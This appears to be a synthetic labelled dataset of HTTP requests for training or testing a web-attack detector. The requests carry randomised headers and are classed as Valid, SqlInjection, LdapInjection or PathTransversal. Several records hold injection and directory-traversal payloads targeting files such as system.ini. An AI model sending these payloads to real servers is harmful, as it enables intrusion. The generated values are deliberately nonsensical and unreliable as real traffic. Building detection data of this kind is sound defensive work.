User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 5.1; ee-zr; rv:1.7.4) Gecko/54323983
UA-CPU: Sparc
UA-Disp: 759,727,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4728x760
Via: 6.1 www.ogtss.html, eti/6.9 www.onul.png:330
Transfer-Encoding: 3nkafo; rtezhy=r1ta27r
Upgrade: bHo/6.3, 1iTaa/1.7
Warning: 619 www.unewft.css:20710 "7ten3citeur" "Fri, 03 Dec 04 07:52:47 UTC"
X-Forwarded-For: 92.118.67.194
X-Serial-Number: 6750967097999329
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14767
Start - Id: 41684
class: SqlInjection
GET /een8ontnchohiiwm/tA_NZ9xI.asmx?nleotoze4s=3110223&lam=%27+AND++++USER_NAME%28%29%3D%27oeNqt&xpasswdAVD9likeQ=nn HTTP/1.1
Host: www.eoetsoa.org:73
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr;q=0.9, iso-8859-6;q=0.5, x-mac-greek;q=0.3, utf-8;q=0.8, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: xnhb-ysanTbfr
Cache-Control: no-store
Client-ip: 106.39.43.168
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="6"
Date: Sat, 16 Sep 06 03:05:37 UTC
ETag: "GYdRMLZJryVuagR3"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Thu, 23 Mar 06 13:43:40 GMT
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: "Xqu2mkatyNAiS.xIl"
If-Range: "LyPJQDwlc.ZQPejQ"
Max-Forwards: 172
MIME-Version: 7.5
Pragma: w='hyag8d'
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: 87689-74,-52021,11-
Referer: http://au08w.uk/RbNAo.tar.gz
TE: chunked,gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.0 (X11; U; Linux i586 1.1; ue-TR; rv:4.8.1) Gecko/65903236
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: 5.8 www.2eweqi.htm, 4zeNn/1.7 www.r4x8sO.gif, FTP/3.3 www.9A8k.shtml
Transfer-Encoding: deflate
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41684
Start - Id: 38967
class: LdapInjection
GET /node3b/cuisjnasimwzhssC/brsj0ath/yxC_NJ/Vfvaruj%u@group byP_Q/mrXd4dspEo9ciu/gstgnhasi3/a66/tsta/i@0MtJgA9rR1wOZMw/wgetE/Iboot.iniG.jsp?rS9=ap+asEglogd7selUz&7log=8sats%29%28%26%28objectClass+++%3D+++uyn*%29&2insertZI1f=oha&8hgrocctzq=apypassthruw&dln8rNp=2645796&i0aticubkitqr=leBo7un&oehrgntutubmrJh=%40m31&8nsnkxn=r63Ova55a6s&fluelKTH7OID=9245590 HTTP/1.0
Host: www.cepdrta.net
Connection: utsie
Accept: audio/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 148.36.134.129
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="2"
Date: Wed, 30 Jul 08 10:27:39 CET
ETag: "UHQB-TkfNTVLF8xK"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Wed, 16 Dec 09 11:48:17 CET
If-Unmodified-Since: Thu, 27 Apr 06 06:14:09 GMT
If-Match: *
If-None-Match: "1DJXBMT7kEwU@7tZ@vQ"
If-Range: "vDWG5BbUkt0NAYk"
Max-Forwards: 4806
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: oestn o6ftes=tfla
Range: -4,236-4976,748576-21
Referer: /seuneicd/atyetd/Ogiea.pl
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/7.4 (Windows; U; Win 9x 4.0; fe-so; rv:3.0.7) Gecko/22247285
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0621x5666
Via: 2.2 www.msmmhbh.gif, HTTP/4.2 189.71.159.95:9, hehsw/5.7 www.swch.html:55547
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 244 129.54.234.141 "tdkaRrieoeridtsfiy" 
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38967
Start - Id: 8641
class: Valid
GET /YEshutdownqsrhY7/3GKgI0w/ekg1e/hwIOOkT4Fh/W0Y/oP5Qj9qkLG8_-tqDG0/aBEGxMgUqh6qAZ6cfA6-/X05txG7cz/i0n/.2tPJfHQ8.C5Fm/vSdhtepemet3il75c/AjRjMQlibBeRFxI-0.jsp?bac0fau0ht=n+796a7&Ao=fhauftrr1kRotci&EHHz@EN=1 HTTP/1.0
Host: www.eugGlaH.ch:8526
Connection: tsfli
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 245.251.141.105
Cookie: dmpKV=9;uw7dimohii=hO
Cookie2: $Version="7"
Date: Sun, 26 Feb 06 03:12:48 UTC
ETag: W/"OQtIk4M2x_mZ6m8.cX"
Expect: nvi4
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Sun, 01 Feb 04 15:41:28 GMT
If-Unmodified-Since: Sun, 14 Mar 04 18:52:10 UTC
If-Match: "eO863S-E4mp9uBYc2h6"
If-None-Match: "aLBaJWcd9-f8XQI19F"
If-Range: Mon, 05 Feb 07 13:28:58 CET
Max-Forwards: 995
MIME-Version: 4.8
Pragma: ddnern=luh
Proxy-Authorization: Digest opaque="hnqcE"
Authorization: Basic RXJlaXhzOmZydmdkbw==
Range: 35-163344,-38,631-
Referer: http://www.2bcbeh.uk/so9in/ns3edwea/oiH1wxu6/sotsvk/0Wiaw.pdf
TE: trailers
Trailer: Host
User-Agent: enweeyephzwnqmmfzoin
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8393x485
Via: 2.5 www.9ndh.htm
Transfer-Encoding: compress
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 978 www.7otT.css "fraauadw2rek0lel5" "Sun, 20 Jul 08 18:39:31 CET"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8641
Start - Id: 44989
class: PathTransversal
GET /ejearemawaSoiIenh/shutdownQSXslQKvB6phB/oF/iWb7yk8/mnkcttn6.cgi?ouiser=4&cop9feNSuntdHao=ehsuewn&hNoehlnbf0fp=jrWp&iiaiamwhwdi=ecoe&nF=..%2F..%2F..%2Fngliil%2Fadmin.txt&aiu=n&emQrsv2sPr=+uMe+uawe&dlen=587054125 HTTP/1.0
Host: www.pfonvhon.gov
Connection: wmemne4e
Accept: */*;q=0.1
Accept-Charset: euc-cn;q=0.4, iso-8859-8;q=0.4, iso-8859-6, cp-932
Accept-Encoding: gzip;q=0.9, compress, compress, compress, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 223.133.197.156
Cookie: 5hthathegevdnhs=eeellt;oa=larfer;u9aalem8c=15;1y35ien30rrh=sock_streamscriptnsA95nj
Cookie2: $Version="8"
Date: Sun, 05 Jul 09 12:13:15 GMT
ETag: W/"K3wowyZow_Ffh6Twf9et"
Expect: potvSX=cregh;Dgtzo=behsO1a
From: esra@5dfeusd9Lo.de
If-Modified-Since: Wed, 14 Apr 04 20:14:10 GMT
If-Unmodified-Since: Tue, 22 Mar 05 16:23:36 CET
If-Match: *
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: *
Max-Forwards: 7339
MIME-Version: 8.3
Pragma: aaeefew='jbwsitm'
Proxy-Authorization: Basic ZW5sdGlvTnU6aDV0cG5l
Authorization: Basic dGJ0ZDplR2ZhaDY=
Range: -724
Referer: http://www.leizn5.biz/eDtg/6io4.png
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: GDcAnie
UA-CPU: 68000
UA-Disp: 810,5138,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: identity
Upgrade: 2sihh/3.3, x4nlo1/8.6, M1u/8.1, escfn/6.3
Warning: 947 104.115.69.47 "thhtcs4" "Tue, 22 Jul 08 21:19:00 GMT"
X-Forwarded-For: 235.153.99.79
X-Serial-Number: 8606404239
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44989
Start - Id: 16853
class: Valid
GET /Iecyrfusse/re4PH0includeVpassthruconnect/P7kwinntCjVspasswdJw/0SQOWFXVLTdLYha/12sjhnoFhgIFx.SnQzP/xngKibw/iMF.8D/ebwlexrso8esec3its/vtxTDaV/rwjoitc6ssrVaante/I4wc81kwOpassthruDCsh/cDKCw-qQKVM5gdgE2CjX.dll? HTTP/1.1
Host: 228.247.203.56
Connection: keep-alive
Accept: audio/*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.9, compress;q=0.8, deflate;q=0.1
Accept-Language: unNqry-vvuetok;q=0.4, wEepe-Hsaez
Cache-Control: max-stale=560
Client-ip: 172.214.161.182
Cookie: orcoba4dce=421;os3o=lfaes1Ni5onmfrdth;esHeullh=2d bl-tlOrio0rt;uiloleetaM=t71ey
Cookie2: $Version="853"
Date: Mon, 26 Jul 04 24:49:43 UTC
ETag: "V29@03SClCVOTAc"
Expect: 100-continue
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Wed, 04 Apr 07 03:05:56 GMT
If-Unmodified-Since: Mon, 20 Nov 06 06:24:07 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Nov 05 21:09:53 CET
Max-Forwards: 263
MIME-Version: 0.6
Pragma: jnAltil=ctef
Proxy-Authorization: Basic cHNjaWVyZXE6ZWlvY24=
Authorization: Basic eXVyYWVmczpycm1lTGoy
Range: -2762
Referer: /safeoe/weanv/eetay.msf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/9.5 (X11; U; Linux i586 0.2; se-dt; rv:0.2.8) Gecko/95075980
UA-CPU: Sparc
UA-Disp: 199,9704,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 818x5345
Via: 9.8 168.54.163.187
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 926077
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16853
Start - Id: 36038
class: PathTransversal
GET /tC8mTx7Jo/sQxyIuBw/HXbetween0N.msf?b.positioncjT@=nwICAmetln0ae&ntj=143120&oe0=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&Z7-Zr8o=hhcs&XAQPaVO=scriptht&Nioeaan4=eair%26&Chny3trcn2ydms=5872&pdetoazdN=c7V5KsQ&ndj5nm3unoxjt=6605&kopblcmei5s=t-%3Ch%3D%5Cemutwget%27%25l2r%5Dcopyeo&du5isiqhcj=e3dv&erhnhiin=edwoe&6xp_I3ueval59Rm77=expLudlbetlp HTTP/1.0
Host: 123.170.116.141
Connection: qRei
Accept: audio/*;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.8, x-mac-roman, windows-1251, gb2312;q=0.4, windows-1252
Accept-Encoding: compress, identity, gzip;q=0.0
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 87.93.92.255
Cookie: eenkanrersfeg=8283;hpd=asaNl;uyl7Nmu1tbbesr=21;csc6ow=tar&<7uQsfgO\tb
Cookie2: $Version="8"
Date: Tue, 22 Nov 05 03:15:31 CET
ETag: "dqM_4UuMnTQ3BNZBkT-X"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 19 Apr 04 21:45:25 GMT
If-Unmodified-Since: Wed, 24 May 06 12:49:29 UTC
If-Match: *
If-None-Match: "2eCXn@u.Jlf6W7HsT"
If-Range: Mon, 08 May 06 10:09:37 UTC
Max-Forwards: 8
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: nizw 8I6iiEN3=seei95mG
Range: 709-485
Referer: /dDno7.sh
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 3.4; sh-ae; rv:2.1.6) Gecko/82148472
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: gzip
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36038
Start - Id: 19839
class: Valid
GET /mceutnHsY4inedGmIaLk/y6eul/Iopen/uoi6update@gQKfD.cfm?ebae=f-ne&eee=93&K4Su5eonu2n=wEer&onzdntcna=4744 HTTP/1.1
Host: www.Riitp.cz:80
Connection: keep-alive
Accept: video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.9, gzip;q=0.4, deflate
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 18.141.33.165
Cookie: smefeaHrteteTDu=83277;xEir=egm;ewele=tmp0eae;Lkpwinnt2H=nge7elmhnr;rrh= E
Cookie2: $Version="666"
Date: Sun, 25 Nov 07 13:08:18 GMT
ETag: "iiJVmMGMPs5erwR"
Expect: y2Szemat=aeewSu;e5dz04l=nnNt
From: ltreys@reovt.gov
If-Modified-Since: Wed, 09 Jun 04 01:12:53 GMT
If-Unmodified-Since: Tue, 26 Jan 10 10:17:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 07:23:41 GMT
Max-Forwards: 6464
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest username="NoExp"
Authorization: asdsca broUbot=v1Hmd
Range: 31-27672,31-,92-
Referer: http://dh0il6o.com/xdtva/ytcc/lonrH7/gtumse/lmiire.cfm
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/2.2 (Windows; U; Win 9x 5.8; om-dt; rv:2.3.3) Gecko/93637644
UA-CPU: StrongARM
UA-Disp: 563,5037,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: HTTP/4.3 www.nnthubfc.png, 8.0 www.etel.js:324, nrksto/0.5 www.4ttwet9.gif
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19839
Start - Id: 34030
class: Valid
POST /hm/ipiuSh1uhtlihwajseb/eN2GPbjFiB2X/0.s8LpEDXc/4iozR-2pklyKUG/f7p_zOB/nEttO2DWKQ@q/rWgCI4C-zeZXFM2/LrbV/8E1yJA18dmHxxwUd.htm? HTTP/1.1
Content-Length: 194
Content-Language: eD,eelIeW2x,oSil
Content-Encoding: compress
Content-Location: http://www.yzDuaoj.de/ortpeot/wauEm5tn/eoae.js
Content-MD5: ZXRldHR3ZGVTZndldXVzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jul 04 14:29:05 CET
Last-Modified: Thu, 07 May 09 03:55:23 GMT
Host: 109.131.235.146
Connection: keep-alive
Accept: text/xml, video/quicktime;q=0.2, application/zip;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: orDnthmd-2OJihotm;q=0.9, mo8-eydhbeie, en5tloo-t;q=0.2, h-je0m
Cache-Control: no-store
Client-ip: 13.131.30.221
Cookie: iteDilauc=weuohaN;Iofo49smrpeoeo=]6ms;Ue=oH5g;6ipassthru3=5;smgh=197789391
Cookie2: $Version="899"
Date: Thu, 30 Jun 05 08:39:07 CET
ETag: W/"8uhDsez5ZihJIHo5GzRe"
Expect: 100-continue
From: 7iOt@lhnabEhrOt.cz
If-Modified-Since: Sat, 10 Oct 09 16:27:27 CET
If-Unmodified-Since: Fri, 09 Sep 05 24:52:19 GMT
If-Match: *
If-None-Match: "-71elWhvGrGfR4opx"
If-Range: Mon, 24 Apr 06 23:10:55 UTC
Max-Forwards: 7654
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM YW5pZWFvc3BzZm91bWRhQnNhYWFPVWlyaHNhZXNyb09ndGV4dG4=
Range: -72
Referer: http://ysiw.ch/ercee/ejowi4.gif
TE: chunked,chunked;q=0.5,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: mStepwr/9.1.1
UA-CPU: PowerPC
UA-Disp: 6904,9748,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 682x2942
Via: 3.5 209.249.204.18:16
Transfer-Encoding: gzip
Upgrade: anaia/9.7, aiu/9.9, oWi5re/8.7
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 246.248.207.159
X-Serial-Number: 852219
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ner2lo=eGkj0O&wne=?tn7aeV&yeal3Ss5=60054&eiieal=45815485&zhvwz6Zdl=i &xt2mRasst=r6st&aafMstux=nJtcWs&c4epv0Atg=ccntada7orvrtes&K1connect6=67847103&aiirraUeaehsena=hH9Q&enrOadeiplle1ii=cmda:e

End - Id: 34030
Start - Id: 45816
class: PathTransversal
GET /a45oldisgcsNeab4XEio/nts8envx.html?uWARUJ.G_hDB=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fnare%2Forarol%2Fmeicgeel%2Fninionnill.asmx HTTP/1.0
Host: 233.130.146.205
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: windows-874;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 38.230.25.170
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="2"
Date: Tue, 27 Jun 06 08:41:55 GMT
ETag: W/"UeVdKYywRQ.A6wz"
Expect: 100-continue
From: rpAl@yhsq9eT1.st
If-Modified-Since: Thu, 02 Jun 05 03:00:48 GMT
If-Unmodified-Since: Fri, 25 Apr 08 02:56:58 GMT
If-Match: *
If-None-Match: "c3LQwWVPuEMKRCWH0gf"
If-Range: Fri, 16 Sep 05 07:40:19 CET
Max-Forwards: 086
MIME-Version: 1.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: http://oase2pg.uk/a0kvqAc/Dast3.swf
TE: trailers,deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/8.7 (compatible; a6eu0n; SunOS sun4u; wuautaetb)
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0280x466
Via: 7.0 21.39.153.126, 6.2 165.165.27.229:3
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 348 176.99.74.150 "C9nbizlettg" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45816
Start - Id: 15136
class: Valid
GET /aP.ZY/kCpzZHb9pGTRdlKtQV5/tqnj2DXc5sI/jqneatynTai/goitreiYnsu5i/dALJ/ohXbfh_mN1G8aH.EKK/1hheaasnozMtb3/-y9rdJa/exsp0P.MfuL..J-5@/sP0wform9Zooptk/aoyuminfRCI.sh?esUOf=tw5HI%40S36PwB&ttL4eg=w&sglIweEloNluun=L&tAa1ptooh6rkol=iEunotubnn&6xatIeoene=rHEetcp&XzautoexecaOT=58829618&aEa7rhspszu7bci=em%28xr&aFR3Yupdate=Tirr&g0=rlhyenoRi7rroe6S71&seNiuteiA=i3+%40iIa&qharthl=n7L6DKVl&iAI6ri8tauEGloo=099 HTTP/1.0
Host: www.lWUrfLigsn.gov:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-5, iso-2022-jp;q=0.3, windows-1252;q=0.8, koi8-r
Accept-Encoding: 
Accept-Language: arcn4et-tce;q=0.0
Cache-Control: max-age=0
Client-ip: 56.153.140.186
Cookie: n0upcmdNVTvar5=yiexMI7ntptbdrTar
Cookie2: $Version="626"
Date: Sat, 14 Jan 06 11:59:44 GMT
ETag: "gpo4vmx3e_svOHVb"
Expect: icIaiG=peynEls
From: tcnemzxc@oisi.it
If-Modified-Since: Fri, 05 Feb 10 05:17:06 CET
If-Unmodified-Since: Sat, 01 Nov 08 12:52:07 UTC
If-Match: *
If-None-Match: "xi0C@WGAjnqvFFwLJjj"
If-Range: "iWJFNWFJve5w_cmB-Icw"
Max-Forwards: 667
MIME-Version: 6.6
Pragma: tea=rh
Proxy-Authorization: NTLM cjN2d0l6NmxVOHJuaWgxOWhlZWFpdmV6YTJub3JON3Q=
Authorization: Basic cnZvdG86dGU4ZWx0RA==
Range: 8-,8116-1
Referer: /he33/znpe9ena/buoib/setyat.tar.gz
TE: trailers,deflate;q=0.5,trailers
Trailer: User-Agent
User-Agent: bsRwrewoa4lr1hw8n
UA-CPU: 68000
UA-Disp: 7020,108,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 572x437
Via: FTP/3.1 211.163.140.137, 6.4 www.rSnl.htm
Transfer-Encoding: identity
Upgrade: 0eh/6.4, osGe/9.1, lftl/8.8
Warning: 492 198.163.135.58 "Xr8olpskba5escfetmfl" "Tue, 05 Jul 05 16:42:14 UTC"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 233434892494
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15136
Start - Id: 14021
class: Valid
GET /hJo2WyH6pBv0bLITnD./aLTnU5ZZATuJXT0LK/sqit1/dqBhqupvA.htm?aemRnsnucv=12494895&tcrds1hngEeakd=%5DoztzxtelnetEt2araeretmi&tijtygi=167050571 HTTP/1.0
Host: www.vsrseyeh.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 5-iuhS9w;q=0.6, l4zdir3I-y;q=0.1, et7clgo-qwlneDbG;q=0.0
Cache-Control: no-cache
Client-ip: 179.129.106.47
Cookie: Egedw5o=nvai< ftpformagyN';hre=e|ytevar6nm;ymey=wih;W77https3Uwq=?;BnZVzIR7Tb=mbwnw;TA \e1adocumentev'y?o
Cookie2: $Version="19"
Date: Fri, 24 Mar 06 07:10:57 CET
ETag: "JNZGOjo3CLmtjeS6gl8e"
Expect: 0PLIf
From: aeeaqe@ea10ef.st
If-Modified-Since: Fri, 04 Dec 09 23:06:07 CET
If-Unmodified-Since: Wed, 17 Jan 07 10:34:08 UTC
If-Match: *
If-None-Match: "eHyB8rivbphy5fx"
If-Range: Wed, 26 Dec 07 21:03:05 GMT
Max-Forwards: 6463
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bWVkY0Q6ZW9zZGEz
Authorization: Basic ZWVPc3M6c3RuTWVscg==
Range: -2,-28865
Referer: http://www.4nws.cz/oacn3/4cio/hslcoez.jsp
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.8 (compatible; dtnnE0; Linux i386; tyQn1; ic3hmrce7)
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8443x481
Via: eyo/4.7 144.102.46.233, 1.0 www.do7wth.html, 6.6 238.125.51.175
Transfer-Encoding: deflate
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 303 27.61.130.243 "4sxeeeopTs5wI" "Mon, 20 Nov 06 24:32:15 UTC"
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 0043438224132828242
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14021
Start - Id: 37807
class: LdapInjection
GET /tOLT5aos/a0ePZz8jo8UNQSizG-Fv/4-r/em.Er8i/l5tob.png?jOk@9gZ1nK46=%29++++%28+++%7C%28viite%3Dtr*%29 HTTP/1.1
Host: www.UCypC.biz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: ueae-oTzsrLif, g4edl3-glofM1s
Cache-Control: only-if-cached
Client-ip: 148.220.0.143
Cookie: gospa=77696541;oi1rnO6s=pet31lNiuitfnf;7LnS9nodleaaaac=11769846;i6rEevlBvhee=3naperltbodyhconnecthsSnnullestdinelsf;5uwtar=rL2FU-3brCk;2-J6=h6OvoHTcv-07
Cookie2: $Version="22"
Date: Fri, 22 Oct 04 08:12:21 UTC
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: B0ct=to3ne
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 02 Feb 06 18:35:09 GMT
If-Match: "Zb0wf2BeHixBzcF"
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 534
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic dDFsUjp4aGVpdA==
Range: -1,56487-
Referer: http://bpetei.com/weo2leiX/hOncld/ihkwov8b/Tteet/egni.tiff
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: hhegbf (mQ.Ighb; auRuIP; hWvvxu3; inW6RVPi; tvT1YX40z@)
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/9.1 www.74qads5.css
Transfer-Encoding: identity
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37807
Start - Id: 27441
class: Valid
GET /oh/togjdreoehymo9anO/oabw6er/dGAW/eeeeuo9no1tregoke8/systemI0lb/erb1sbnoaiaeo/replaceUsystemc/dUJMj46A34vGPjW7MZ/iySfdWyWWe.cgi?olieo7=72682&kuCnE=96915602&me7ZEitI=953140&asyjelaiawexh=ernUaSathg&09=719&trwl1rooamtr=1&3e4tn=evbscript+T%2Bsdo%3C&orWgx=cQH&uriosdooT=hvSrZ. HTTP/1.1
Host: www.tyro.net
Connection: tenre6N
Accept: application/x-tar;q=0.5
Accept-Charset: windows-1258, windows-1257
Accept-Encoding: identity, identity, deflate;q=0.8, gzip;q=0.5
Accept-Language: Trse-sn
Cache-Control: max-age=68933
Client-ip: 12.19.35.21
Cookie: stdrrvp0ilizl=f\hGstyle'e;piLgii=eEZcqLkY;Hlgp=trt;rrTfai4aEs=4693;Sr=trn;Nkte=5i
Cookie2: $Version="3"
Date: Sat, 28 Aug 04 19:24:19 GMT
ETag: "TxkeDqa15iDuNrb0yk"
Expect: coouoR
From: oHacohiv@esserlt.cz
If-Modified-Since: Wed, 08 Jun 05 11:06:39 UTC
If-Unmodified-Since: Sun, 28 Sep 08 15:30:53 CET
If-Match: "O.bLz4ZWUQp4YgndSBT8"
If-None-Match: "gmXzsV7feEKbufNeY"
If-Range: "sedKnLxMO4KiBtZNLMi"
Max-Forwards: 7319
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic b2FUczpOYWJzRWNu
Range: 6111-8086,283-323
Referer: http://mitw.ch/tyee/lwogg/ne1s/bxtim3.css
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.4 (compatible; Konqueror/1.2; Solaris; tjmnnto; dhoGsimn; eano3r6)
UA-CPU: MIPS
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 759x1141
Via: 5.6 www.hnn7r.jpeg, neds/1.9 119.83.65.42:5721, 1.3 www.elLha.css
Transfer-Encoding: gzip
Upgrade: aof/7.7, e9Azie/5.3, isosn/8.8
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 4957101
----: ------------------------------
